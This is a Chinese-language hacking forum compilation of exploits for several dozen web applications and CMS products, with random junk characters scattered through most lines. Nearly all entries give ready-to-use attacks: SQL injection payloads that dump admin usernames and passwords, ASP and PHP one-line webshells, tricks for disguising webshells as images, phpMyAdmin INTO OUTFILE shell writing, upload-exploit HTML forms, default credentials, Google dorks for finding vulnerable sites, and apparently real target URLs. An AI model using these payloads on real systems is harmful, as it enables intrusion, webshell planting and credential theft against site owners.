启航企业建站系统 cookie注入漏洞通杀所有版本5 U8 k4 u1 d: |6 R! o1 s: l
! p2 ]2 c8 t- H+ s/ I直接上exploit:( f8 p( o# {; R5 z
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));" y& _% D' H+ O1 x
test:http://www.tb11.net/system/xitong/shownews.asp?id=210# X( Z- v( z9 g5 m* ?; J# V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 [/ N* F9 H# q1 R& A# V- JAsprain论坛 注册用户 上传图片就可拿到webshell* J7 K/ p/ X% o5 F
2 l3 w) i' H9 [$ t1 H" [" }Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。( F/ F6 h3 y( A+ d6 ]
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>& U- o9 s& V* j, q; s7 s
2.gif 为一小图片文件,一定要小,比如qq表情图片4 Q! m9 P T+ v K9 d) a
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用9 \3 n- }. w- w. z' R
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
& F1 \) P$ y! v K/ o$ ]* ^, v C5.q.asp;.gif
9 Q1 g; `0 w: m$ ]# rgoogle:Powered by Asprain1 l8 F. O d7 o) t9 Z( d, D7 H- T
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 _" ^, |$ \6 G; N1 X% e9 A' h& U
?$ D' s! M: p" j- OShopNum1全部系统存在上传漏洞。3 |6 L% L7 n. w$ f1 I/ s
& }) x; u3 I* x/ [ t4 T9 H3 o5 X1 F首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。) V( K1 F7 J( D) ^2 v, i" @
按说明 提示登录后台。。
! g! L3 t9 b o" _在后台功能页面->附件管理->附件列表
! }3 F' \' h5 u8 M2 X( l可以直接上传.aspx 后缀木马
- i% d8 ` B" k. shttp://demo.shopnum1.com/upload/20110720083822500.aspx/ t6 j6 P: P. \. x: c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& ?. c$ y: K/ X p% i4 T$ ~5 C+ u
5 v! T6 B) B1 E% _ W7 J" K+ X5 U
牛牛CMS中小企业网站管理系统 上传漏洞$ ]* S+ q% x1 X7 I/ m' o' q/ l
/ B8 a1 \! L. L) b1 t7 s. I: t: ?牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
0 x+ s9 v/ {2 N) R9 `0 {1 m后台:admin/login.asp- \4 S I0 G$ G2 B7 Y/ |/ x$ S8 i
ewebeditor 5.5 Nday
" c7 I" v3 E, O8 [1 u# d4 {* ?' vexp:) F5 r$ p3 r$ U$ p" y( Z6 F" {% `
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
3 E9 u8 E6 e* c2 J7 y- y! O; I<input?type=file?name=uploadfile?size=100><br><br>?
# A1 {- Q3 r% h5 t2 n<input?type=submit?value=upload>?8 @- i* i E# K" H4 g4 J9 ]% H) M
</form># z3 {8 N! a& O2 V% Q
ps:先上传小马.* q. l% L* o0 h0 E& @0 u8 L* q; @3 n e
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏5 m+ G! R) S0 w9 Y4 F5 p
+ E8 j; B! v. Q) A8 h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 [% Q/ `3 Q. y4 y( K9 ]6 Y/ U) [* B& d8 D* r5 R6 }
YothCMS 遍历目录漏洞) K! W5 R! P# D
8 b6 x+ |3 q2 s! _/ Z1 O优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
5 B8 @4 Q. q% ~默认后台:admin/login.asp
) u- r1 @: n" {" y3 O+ D遍历目录:
9 e) u1 M% Z' c6 Jewebeditor/manage/upload.asp?id=1&dir=../1 u- v" F7 |6 w( q o% S
data:9 y$ n5 ]' ~9 \) Q5 O4 t& u# J) c
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa- I6 j* W* x N# U& s8 y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 }: \# Z- }* B" y9 h) z/ B
* ?9 L' l. W% w* HNet112企业建站系统 1.0 v, S$ S% G2 [* H8 `# Q2 R
# a. ?, j0 u4 h- W# m y; _源码简介:- M8 I- k8 M% E& j5 U- y: m6 n
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
/ m7 [0 u7 D/ o$ ]0 Z* R添加管理员:
7 v+ u2 T5 _' b- S" Chttp://www.0855.tv/admin/admin.asp?action=add&level=2- m& ~0 T$ P" i% j2 g+ B
其实加不加都不是很重要,后台文件都没怎么作验证。
& P$ K; u1 Q. G3 ~" E0 h上传路径:$ C2 U- y( E8 D8 u2 B( y
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
" _+ v) e7 ?. ^0 ]: E: z, [http://www.0855.tv/inc/Upfile.asp?Stype=25 \) |- _' W6 O) v. ^
怎么利用自己研究。/ a( p# ?9 b8 X9 C5 c
遍历目录:
+ N4 v5 B6 B6 X* a& C& x% Z thttp://www.0855.tv/admin/upfile.asp?path=../..
8 E( L3 r; s% c# k/ h7 f如:4 z& U/ D+ B" d6 E9 F
http://www.0855.tv/admin/upfile.asp?path=../admin& g2 d+ B) _$ v2 _
http://www.0855.tv/admin/upfile.asp?path=../data: I9 Q. s1 O F9 t& x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 W$ }& ?: P: Y. h: V; H% a! g* L
易和阳光购物商城通杀 上传漏洞4 w" i7 V& w2 m2 x4 y
* }9 [# f& R/ c( _; [前提要求是IIS6.0+asp坏境。1 H6 G! R3 G$ j+ C' N; N% P
漏洞文件Iheeo_upfile.asp
5 j& r' ~ X/ [过滤不严.直接可以iis6.0上传
9 _" u; l j* d6 ^0 |把ASP木马改成0855.asp;1.gif
* g0 @+ @0 ]" R5 R n+ m: t+ j直接放到明小子上传& _( Q0 d" z; a) F9 I; o- |
Google搜索:inurl:product.asp?Iheeoid=
6 S9 J4 L$ _ [* q6 V" @ i) R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" h# d$ K# x: V! y2 n2 ?1 x5 q' A% |: G2 w, J
phpmyadmin后台4种拿shell方法
% q) y/ h. I! _4 N0 g! X: q F
. F& E8 N, v @方法一:2 j3 B( a- _) ], U' l
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );+ _7 z4 Q) `+ P: J4 V* f; J& @. |
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');7 K/ T& v4 N1 E
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
H1 M+ @7 E- S: h----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php7 S3 ^" ^# y3 f* Z$ g/ j! ]
一句话连接密码:xiaoma# r+ B; W6 _9 }
方法二:
- I, q5 K2 O8 ?9 L2 E6 s* [Create TABLE xiaoma (xiaoma1 text NOT NULL);5 F* M$ u8 _' K
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');# g" S- h7 l0 J- G! T& P
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
d, `& e3 Q- E- a! nDrop TABLE IF EXISTS xiaoma;
1 Q* A" k: M3 v7 U# i( m方法三:* @/ U# b i2 x/ F t
读取文件内容: select load_file('E:/xamp/www/s.php');
/ f3 J9 f4 `- p( v' a1 D0 R写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" E: U1 ]6 R# lcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, n. {8 ~% C6 A3 ?方法四:
! f/ |; o$ t6 Q) v' r' H0 n) z) kselect load_file('E:/xamp/www/xiaoma.php');1 `, T4 \9 V1 J3 h% E8 g0 |; l% @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'" y3 z0 _9 y7 k$ _/ O
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
7 w3 D. i7 `6 a3 u3 D0 n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' k" c+ P( }! ^2 z* |+ F1 t7 h% J; V
, j* R4 t* [8 G: j
传信网络独立开发网站源码0day漏洞
& H" E! ~( w/ x5 c$ S( n- L3 R8 \: g; u" R4 d7 y
后台system/login.asp& g; E" ~7 A3 y
进了后台有个ewebeditor
_% `+ S6 J' j2 o% J! ^1 v% t. s/ BGoogle 搜索inurl:product1.asp?tyc=. n; g' ~: {' i4 v: C
编辑器漏洞默认后台ubbcode/admin_login.asp
0 K0 a2 x3 m, c; l$ P# ]数据库ubbcode/db/ewebeditor.mdb
% l* M2 `1 i% M默认账号密码yzm 1111110 S" N! p6 J; k% s* Z" v
' e% e8 u4 W) X% l& P$ X4 X) c
拿webshell方法2 e H& f$ b, G4 S0 n% i ~
登陆后台点击“样式管理”-选择新增样式
4 z( y7 O5 m; W6 C( s样式名称:scriptkiddies 随便写 & C0 N/ u" _7 t! X3 c2 l
路径模式:选择绝对路径
* Q0 m( N9 W+ k! F4 E( J/ O图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx. u2 }3 O" _; S" I7 J
图片类型比如就是我们要上传的ASP木马格式* a5 T; K {" W8 s
上传路径:/
$ N" N! T6 ^& m/ p, j# w图片限制:写上1000 免的上不了我们的asp木马. [( K6 L2 O" K) o" _7 f
上传内容不要写
0 O z* Z# F9 @可以提交了
! t3 C! R3 m+ L: s' i样式增加成功! 7 W* `2 r+ m1 m+ M
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
, U) `; h3 m! }& ^7 b3 d按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置6 \+ X ` e. J3 }4 [
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies! @+ E& ]9 J. a
上ASP木马 回车 等到路径
1 l: k8 E6 p1 ~# i- M: J* K* g& \& ]5 h$ N; R1 E& R! w
后台:system/login.asp
7 `6 D$ @! U' jExp:
- T; B) ^+ a2 Iand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 @7 z0 Z8 {' g$ S测试:9 {2 e% O% Y. x; u0 P$ g' C) }
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
* d( ~# [, ]. ^$ u8 rhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
7 x9 n1 _5 @" R' [* }--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' E b3 c, L. L! q
2 i9 a# C" z+ v; t$ L4 m8 }& R o4 M# E0 J
foosun 0day 最新注入漏洞
+ ~' z% F: }' P4 p* Q B- C/ x
/ I* @3 V$ }# l3 r$ p- J漏洞文件:www.xxx.com/user/SetNextOptions.asp Z7 P+ s9 R2 B; r8 {6 h. u; r* y
利用简单的方法:8 O N; a' g$ O7 o
暴管理员帐号:
/ Y2 d9 C- O# }9 q) ehttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin& O2 c/ P3 k8 R' @; g8 P
暴管理员密码:
' k( ^1 w2 M- o+ y7 t" @0 dhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,. @7 i4 `- B! K' \# d: C3 Y# L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 [- r" K* C4 u6 J3 `. ` k8 e4 L& I7 W( b3 l: w
网站程序的版权未知!' `. g! J/ v5 r% u
$ ?- ~4 m5 G+ z/ W0 w/ Z
默认网站数据库:9 M9 M# t/ o7 \, S. q
www.i0day.com/data/nxnews.mdb% t- R# \% v- E6 r+ l# y$ [ f2 `5 |
ewebeditor 在线编辑器:
8 \- @/ \/ L# \& K* A. ^7 {编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
5 J, O& y3 J8 @; {登录地址:ewebeditor/admin_login.asp& z0 e' i" f( a
默认密码:admin admin
* \' C/ i7 A) P8 p6 {6 L2 \% S登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data7 T1 G9 g4 Q9 b5 t! @' U7 G. q& E+ y
6 L% C/ W2 }6 lSql注入漏洞:, K5 M I& {$ f3 U7 _0 c+ j
http://www.i0day.com/detail.asp?id=12
) A3 d4 r' c% @! ?9 Mexp:) t7 v4 z6 c6 {6 n/ U2 ?. S
union select 1,admin,password,4,5,6,7,8 from admin
, o4 t- Z( b' S0 w爆出明文帐号/密码
- _/ h1 S& n% M" Q" Q& F% W, L1 D* j% ?6 {4 ?. t& E8 z$ ?
上传漏洞:
2 E; i& K2 W% G1 W# D- N后台+upfile.asp- C! l, Z1 x; q7 \( h" n
如:
; {0 q3 n/ m% `+ g- {http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。0 m! \9 u- M& }
shell的地址:网址+后台+成功上传的马# L" q& G* W! R }3 q2 h
google:inurl:news.asp?lanmuName=
+ }1 y, t6 ]% A6 m/ J------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 d8 Z' Y2 M& X; b6 r# o& }; ]7 [. f( x
dedecms最新0day利用不进后台直接拿WEBSHELL l; f' I! S2 c$ {3 d$ D7 m9 b
D) v, d8 M6 Q: {3 _ Z" e9 M
拿webshell的方法如下:
! j, o e# `7 A; u1 o& v% e2 K网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.) _# i7 h1 p- F( ]5 `6 G O* x( r
前题条件,必须准备好自己的dede数据库,然后插入数据:3 g+ }8 G1 L' |0 D) Q( t# e% Z$ H
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ' W+ g0 V* u4 w& B' X6 h, o
`9 u: O+ j- }& [& V: W+ j再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。; P9 T8 e4 `7 A1 t5 _# i
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
5 J I4 N- p" z2 |9 W<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />3 A2 [* L; Y% g4 H! J
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
- ~; @: |+ m# b6 Z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 ^! J- Q& ]0 ^; m9 |4 g2 _/ A- t8 R<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />% C0 N* |8 w& m( S [$ d& m9 U% t+ f9 J
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
! G( O, G/ l! g% g- s<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
3 X% d, E) x7 T0 T<input type="text" value="true" name="nocache" style="width:400">
' ^) x! C7 G2 Z. i<input type="submit" value="提交" name="QuickSearchBtn"><br />
* Y3 ]* {9 Q# N3 G: N. D8 p/ B% G</form>
/ ]9 T! s( x3 Z7 C9 b; _( [5 y' b<script>" V2 _7 j% [9 b) f+ D
function addaction()
$ K& B# `+ P/ S. y{
; B A h! |5 ]+ ?$ l b% E3 ydocument.QuickSearch.action=document.QuickSearch.doaction.value;
% y$ J( c3 j- E ~}
2 U0 |% e" D* n+ z( ^</script>
2 F1 G; y8 Z4 {/ G! M-----------------------------------------------------------------------------------------------------------------------------------------------! n! h6 q8 i( A8 ^8 a
3 M, ~& D% a, L. F9 R0 z
dedecms织梦暴最新严重0day漏洞( j% F; F% F8 K- L2 y7 _" J
bug被利用步骤如下:
2 Q& o: q4 t; X, m* P* Jhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root/ n' s6 G- c) R: d# Y8 S1 V4 c
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
& C, l/ `: ^% l8 x/ i-------------------------------------------------------------------------------------------------------------------------------------------
& H3 N2 L/ a" j' L) I$ D4 d1 P. b! |! t# M* ~& Y
多多淘宝客程序上传漏洞 ' y7 J. p2 s3 E+ w/ ]+ F: X8 V
漏洞页面:/ @! p! e& e8 q9 y( }
admin\upload_pic.php6 x; U1 Q2 \2 P1 v
传送门:+ Z* u3 W* _% e
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
2 [6 S8 C# u g% F H, w2 PPS:copy张图片马 直接 xxx.php 上传抓包地址!/ a/ a: R2 m ^# O& g
------------------------------------------------------------------------------------------------------------------------------------------------------
, B8 p: z9 C% g% G/ y5 C. y( k4 j1 F L0 F% A; d
无忧公司系统ASP专业版后台上传漏洞
8 [6 \, g3 N4 @4 ?漏洞文件 后台上传
+ V$ c' @# K, M* C( Yadmin/uploadPic.asp
" w- H$ R# C& r6 Z( |6 i4 e漏洞利用 这个漏洞好像是雷池的
( t% K' P% _8 g( v$ I# o$ dhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=16 V+ @" c: h- _5 { M; U# k3 N8 q- `
等到的webshell路径:2 A+ E& }- s1 S5 ^
/UploadFiles/scriptkiddies.asp;_2.gif
* l$ g1 Z! a3 w; y9 L8 B9 F---------------------------------------------------------------------------------------------------------------------------------------------------" a. a% S- E- {" a& X& {* R. k" N
$ ^0 n" j- J8 K0 w; B& p0 L1 g住哪酒店分销联盟系统20102 f. x) _' V/ W
Search:
" ]+ ~5 s- [8 k: W$ ^6 kinurl:index.php?m=hotelinfo0 s& B$ a d$ w7 _$ Z! G
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin4 b2 ?& f5 T1 I
默认后台:index.php?m=admin/login
e& |+ |4 Y/ w C, p& M: K" P, y ?--------------------------------------------------------------------------------------------------------------------------------------------------
3 d2 a$ m0 L. ? N+ T0 u5 J) Z. T! c, X! @9 U9 D
inurl:info_Print.asp?ArticleID=0 H. |$ M" ]1 b& M: I; J: L, r; Y. i4 H
后台 ad_login.asp+ S, _4 E9 C4 I' a2 A5 h7 q
爆管理员密码:
/ X9 _# b' U: @- hunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
D- X4 R8 \. A0 {------------------------------------------------------------------------------------------------------------------------------------------------------------
# |! D. T/ s8 T" z) o- f$ r/ @7 |" n0 |3 z& J" o' G3 G
搜索框漏洞!
0 ?6 P& X' U% C9 v%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=') S, u7 U4 d/ ^9 `' C7 s0 b" B/ K6 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------
# I1 `( ?! A- X+ H1 D
+ H$ o( X2 V$ N4 |关键字:
/ [5 H/ U R" j2 U1 ^inurl:/reg_TemletSel.asp?step=2
& R7 Q; D4 }2 J4 Y或者
( K$ s3 }; q% ]3 m' f* n电子商务自助建站--您理想的助手" g, ^& f3 s* d( `) {9 Q
-------------------------------------------------------------------------------------------------------------------------------------------------' u4 E' [- a4 K$ t
) e& Z2 U! s1 } r+ { |- v* Z; hiGiveTest 2.1.0注入漏洞& a1 b+ l2 ? O
Version: <= 2.1.0
/ h {& y6 B& s( M# Homepage: http://iGiveTest.com/
1 Z( D j. B" y; Y d+ J谷歌关键字: “Powered by iGiveTest”2 G3 C8 B* Z- {! F
随便注册一个帐号。然后暴管理员帐号和密码3 Y0 ]! v9 J; ~
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
: R1 ?& J% u; [4 P------------------------------------------------------------------------------------------------------------------------------------------------9 X7 _7 |5 [9 I o
- c% U k3 o; s- w* S5 C+ i
CKXP网上书店注入漏洞
: U7 J" N2 k) A8 ~工具加表:shop_admin 加字段:admin9 ~2 I( |( U; C& K) |( B
后台:admin/login.asp q1 q9 y7 A5 C* A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// \ j8 r: o; I
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息; I! x8 ^/ l! Y$ p6 e2 N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, o& I# p7 g8 A' ~
# x3 r, P) a* U* N1 V, P段富超个人网站系统留言本写马漏洞; d) U, W# p/ L) C* o s
源码下载:http://www.mycodes.net/24/2149.htm
3 j; m6 C$ v& Q# ^6 a8 Aaddgbook.asp 提交一句话。
+ G0 d+ e, H) b6 z& T连接: http://www.xxxx.tv/date/date3f.asp# u+ S8 E' M3 P) r
google:为防批量,特略!+ R8 I* P+ V/ m; o) R
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" W& y0 z0 ]: ?0 l4 }5 w V; F6 K6 k, ^ V
智有道专业旅游系统v1.0 注入及列目录漏洞& u3 c$ t# P/ H' @" Y9 |
默认后台路径:/admin/login.asp
7 L9 E" D. N1 F- {% H默认管理员:admin* |: i1 v) U9 i- Z4 W- X# K' b; X
默认密码:123456( p4 v! U; h ~, H9 C6 }
SQL EXP Tset:
9 g& S8 z4 O }% t) w' Z1 Z; E% h& x$ lhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin. _1 o/ p- L9 X; [$ P* i
------------------------------------------------------------------------------------------------------------------------------------------------------------------------( c% R$ p1 v3 |- H* F
5 c3 O/ ^" o; w% @4 ^! U7 Z
ewebeditor(PHP) Ver 3.8 本任意文件上传0day. D- `# m/ {+ r5 L
EXP:
4 e" ^4 [5 d4 s8 P<title>eWebeditoR3.8 for php任意文件上EXP</title>
1 @1 v, K& A% H<form action="" method=post enctype="multip
& A4 \& S( W9 K9 P/ wart/form-data"> * [6 C- |2 a- ^+ V
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ' Q: K# I. g% a0 f& L
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
- x& U1 _. x" E D2 {<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ t! J/ z0 ^! c! x6 X0 h4 B$ qfile:<input type=file name="uploadfile"><br>
0 d. n4 [, O4 c: c" _& g<input type=button value=submit onclick=fsubmit()>
/ |: c2 z" Q* G- y8 ]) N: e# ]' Q</form><br> 8 F3 ]0 X/ _+ R7 K1 ~8 S$ ^6 {
<script> ' w) n7 x5 H. k# I8 f1 r
function fsubmit(){ 1 t+ u7 R7 [& i7 F
form = document.forms[0];
1 [' F4 |0 x6 H# j- H' ^2 Pform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
5 q' F; f$ w, e& Y, X5 G% y6 ?; J8 oalert(form.action);
# ^( y6 R; V L1 d# g, dform.submit(); " m% z. Y) v4 f: C1 ~: C9 F* \0 C+ |
}
~: b/ {6 p$ b9 j* {, B</script>! A5 ]9 q$ a n; x: e3 y
注意修改里面ewebeditor的名称还有路径。+ ]8 l( p3 H5 j1 Y
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------. O; u$ I' {7 }! r* |
$ Y! r3 N' [, A提交’时提示ip被记录 防注入系统的利用4 t- ~" D8 j! W$ n
网址:http://www.xxx.com/newslist.asp?id=122′1 y; X* s2 K. P
提示“你的操作已被记录!”等信息。+ ~3 n& y* z L/ E5 V/ ]
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。& Y7 X, }" G1 j! i) T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 B( G6 i( X$ W! C& Y, F
m; }( v0 c* v( t/ j. N" w西部商务网站管理系统 批量拿shell-0day
2 k! m( M' n Z这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
4 r* e5 e! Q% A6 c M2 u% W. n1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
7 d8 A4 h; d2 M6 q2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
& V' z4 T1 r% r3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ @ Q/ h' \8 Y---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 |, }2 X# v/ N8 U8 [3 D$ w' \2 y) T- e0 `
JspRun!6.0 论坛管理后台注入漏洞
0 q8 C+ j! o" Y/ h9 y) l3 T$ [- Y0 Z3 c/ n, Y
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:# e8 A) b* V9 \8 U
JspRun!6.0
$ I$ v4 E3 e! u( Y: S. B漏洞描述:, n+ E2 q( B" ]
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
; s2 ~2 O; Z, _7 C- y* b+ U在处理后台提交的文件中ForumManageAction.java第1940行6 B+ W1 F: E8 b3 {- B) p- q
String export = request.getParameter("export");//直接获取,没有安全过滤
2 d3 r3 B8 O: H4 G e) eif(export!=null){) ]7 A; n; F; B0 R+ B8 L
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...1 C& ^9 o4 B1 X5 h' X% X2 O
if(styles==null||styles.size()==0){
3 v: Q! r% V" S8 R9 Y* V<*参考
: e |3 c a! p! h* }nuanfan@gmail.com
6 l& z" ?% S! L8 p) F*> SEBUG安全建议:; K+ t* |8 }% N7 A* I& ?& P
www.jsprun.net4 N: \, s1 U& c) }
(1)安全过滤变量export# s+ \+ N6 Y8 C5 T
(2)在查询语句中使用占位符
1 {) E) T: E/ J2 L------------------------------------------------------------------------------------------------------------------------------------------------------------------------------, M8 ]' U% s7 x$ s5 n4 o7 _
1 ]7 m1 Z) y& }/ P8 m( z/ g/ f乌邦图企业网站系统 cookies 注入6 {" k- d0 K- Z
6 z& x( q8 H" X- o0 A
程序完整登陆后台:/admin/login.asp" P C( r0 X2 V
默认登陆帐号:admin 密码:admin888, t( |' y- e8 E, h+ {
语句:(前面加个空格)
' h. S6 \( X, X7 N, W# rand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
. V. k" \. j. I3 M; _+ z% i: I+ V或者是16个字段:
% r) Q: E# ^* j: G3 ~and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
2 A% {3 U ~8 W) t. l p6 `* s爆不出来自己猜字段。
# M8 w. {7 P( f: j9 |8 U( O注入点:http://www.untnt.com/shownews.asp?=88
1 n/ _; X% l* I a+ dgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp6 r% l; i3 l; T. j7 E
关键字:
) I2 D# g. ]' z) Y% Z: i* Zinurl:shownews?asp.id=5 p, ^! `0 i% h' C) r
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. g" B4 {! p" a. \
+ a1 B8 V, Z- n( Z3 y
CKXP网上书店注入漏洞" Y8 H. L. r o" g" R9 R
& }9 Z$ {+ e" b9 @ `- W
工具加表:shop_admin 加字段:admin, n# c& d0 f; M7 A/ O1 d
后台:admin/login.asp
4 ^2 W. D: |6 k2 v1 X) C登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
( G2 T9 ~! Q4 A' A! oinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息$ ?1 W; T2 m' ~
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ~, ~1 D: b2 b: E3 \9 w
$ O' P: [$ K R7 H' E2 B
YxShop易想购物商城4.7.1版本任意文件上传漏洞' }8 q. i0 T: P* S9 |1 `$ s" l
% i+ e3 l' A* Q# [
http://xxoo.com/controls/fckedit ... aspx/connector.aspx. c B7 v8 S. C1 ?
跳转到网站根目录上传任意文件。, C* O- O+ U7 Z3 o6 J( D# g
